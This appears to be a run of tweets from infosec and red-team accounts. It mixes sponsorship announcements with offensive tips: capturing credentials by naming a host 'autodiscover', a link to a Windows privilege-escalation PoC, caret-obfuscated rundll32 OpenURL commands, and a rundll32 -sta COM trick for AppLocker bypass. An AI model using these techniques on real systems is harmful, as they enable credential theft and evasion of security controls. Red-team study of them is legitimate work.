@nullenc0de Also I am pretty sure this will work on an internal pen test without responder if you name your computer autodiscover because it will register with internal DNS. So any client looking for autodiscover will send you their creds.
@nullenc0de Nice! out of curiosity do you get a connection only when an email client sets up a new email account profile or is it every time the email client is used?
For International Women's Day Red Cursor are sponsoring @0xCC_sh a free training course for all women in infosec/cyber security.
We are proud to support and empower women to follow their passion, whatever that may be.
https://t.co/VXX3BhDBuf show your support
We’re ecstatic to announce
@RedCursorSec
as our latest Gold sponsor!
They’re passionate about breaking down barriers to foster a more positive and empowering environment for women in cyber security and we’re so glad to have their support!
More info: https://t.co/pcPJcCbbCL
Michael has put together a working #PoC for CVE-2020-0668 that allows privilege escalation on all versions of Windows up until the Feb 2020 patch Tuesday. Check it out here: https://t.co/roxERItx9X #netsec
#rednote ProtocolHandler are also work with obf
rundll32 url.dll,OpenURL http://^2^8^9^9^9^0^9^3^8^0^/
rundll32 url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e #redteam
Interesting way to call a COM CLSID:
rundll32.exe -sta {CLSID}
rundll32.exe /sta {CLSID}
Use this with @subTee's #squiblydoo COM Hijack method for a default AppLocker Bypass
Haven't found any sec-related resources with -sta (single threaded apartment)
Anyone seen this before?